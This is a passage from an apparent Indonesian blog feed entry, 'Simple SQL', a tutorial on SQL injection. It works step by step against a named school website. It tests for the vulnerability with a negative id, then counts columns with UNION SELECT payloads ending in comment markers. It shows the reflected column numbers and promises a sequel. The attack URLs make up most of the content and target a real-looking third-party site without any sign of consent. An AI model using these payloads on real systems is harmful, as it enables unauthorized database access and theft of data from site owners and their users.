lang="EN-US"&gt;Kita cari id nya &lt;a href="http://sman1clp.com/index.php?cat=berita&amp;amp;idberita=50"&gt;http://sman1clp.com/index.php?cat=berita&amp;amp;idberita=50&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;Selanjutnya kita cek web tersebut vulner atau gak..&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;Caranya kita kasih tanda – di depan angka id nya. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;Jadi &lt;a href="http://sman1clp.com/index.php?cat=berita&amp;amp;idberita=-50"&gt;http://sman1clp.com/index.php?cat=berita&amp;amp;idberita=-50&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;Apa yg terjadi??blank…&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;Yup, jika kita masukan – didepan angka id dan web menjadi blank atau keluar pesan eror,itu artinya web tersebut vulner.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;&lt;!--[if !supportEmptyParas]--&gt; &lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;Selanjutnya kita cari binery nya. Caranya dengan perintah union select.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;&lt;a href="http://sman1clp.com/index.php?cat=berita&amp;amp;idberita=-50+union+select+1--"&gt;http://sman1clp.com/index.php?cat=berita&amp;amp;idberita=-50+union+select+1--&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;tanda + adalah string Sql yg berarti spasi.sama saja dengan %20. dan -– juga bisa diganti dengan /* untuk lebih jelasnya tentan g-string² SQL, Tanya mbah google.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;Ok,kembali ke tanktop..&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;Setelah kita masukin union select, apa yg terjadi??&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;h1 style="font-weight: normal; font-style: italic;"&gt;&lt;span style="font-size:100%;"&gt;The used SELECT statements have a different number of columns&lt;/span&gt;&lt;/h1&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;Kita tambahkan binerynya&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;&lt;a href="http://sman1clp.com/index.php?cat=berita&amp;amp;idberita=-50+union+select+1,2--"&gt;http://sman1clp.com/index.php?cat=berita&amp;amp;idberita=-50+union+select+1,2--&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;ternyata masih &lt;/span&gt;&lt;i&gt;The used SELECT statements have a different number of columns&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;tambahkan lagi sampe true dan ga kluar lagi pesan tsb.&lt;/p&gt;   &lt;p class="MsoNormal"&gt;Ok, kita dapet&lt;span style="" lang="EN-US"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;&lt;a href="http://sman1clp.com/index.php?cat=berita&amp;amp;idberita=-50+union+select+1,2,3,4,5,6,7--"&gt;http://sman1clp.com/index.php?cat=berita&amp;amp;idberita=-50+union+select+1,2,3,4,5,6,7--&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;      &lt;table style="width: 100%;" width="100%" border="0" cellpadding="0" cellspacing="3"&gt;   &lt;tbody&gt;&lt;tr&gt;   &lt;td style="padding: 1.5pt;"&gt;   &lt;p class="MsoNormal" style="text-align: center;" align="center"&gt;&lt;span class="judulberitastyle3"&gt;3&lt;/span&gt; &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr&gt;   &lt;td style="padding: 1.5pt;"&gt;   &lt;p class="MsoNormal" style="text-align: center;" align="center"&gt;Pengirim : 2, [ 6] &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr&gt;   &lt;td style="padding: 1.5pt;"&gt;  &lt;br /&gt;&lt;/td&gt;  &lt;/tr&gt;  &lt;tr&gt;   &lt;td style="padding: 1.5pt;"&gt;   &lt;p class="MsoNormal"&gt;5&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt; &lt;/tbody&gt; &lt;/table&gt;&lt;br /&gt;ada apa dengan angka² tersebut????&lt;br /&gt;Temukan jawabannya di &lt;span style="font-style: italic; color: rgb(102, 51, 255);"&gt;Tutor SQL Part 2&lt;/span&gt; hehehehehhehe..&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/605449655022693477-5599920914729825327?l=pantai11.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pantai11.blogspot.com/feeds/5599920914729825327/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://pantai11.blogspot.com/2010/06/simple-sql.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/605449655022693477/posts/default/5599920914729825327'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/605449655022693477/posts/default/5599920914729825327'/><link rel='alternate' type='text/html' href='http://pantai11.blogspot.com/2010/06/simple-sql.html' title='Simple SQL'/><author><name>["P-H-T"]</name><uri>http://www.blogger.com/profile/08176225590488967659</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
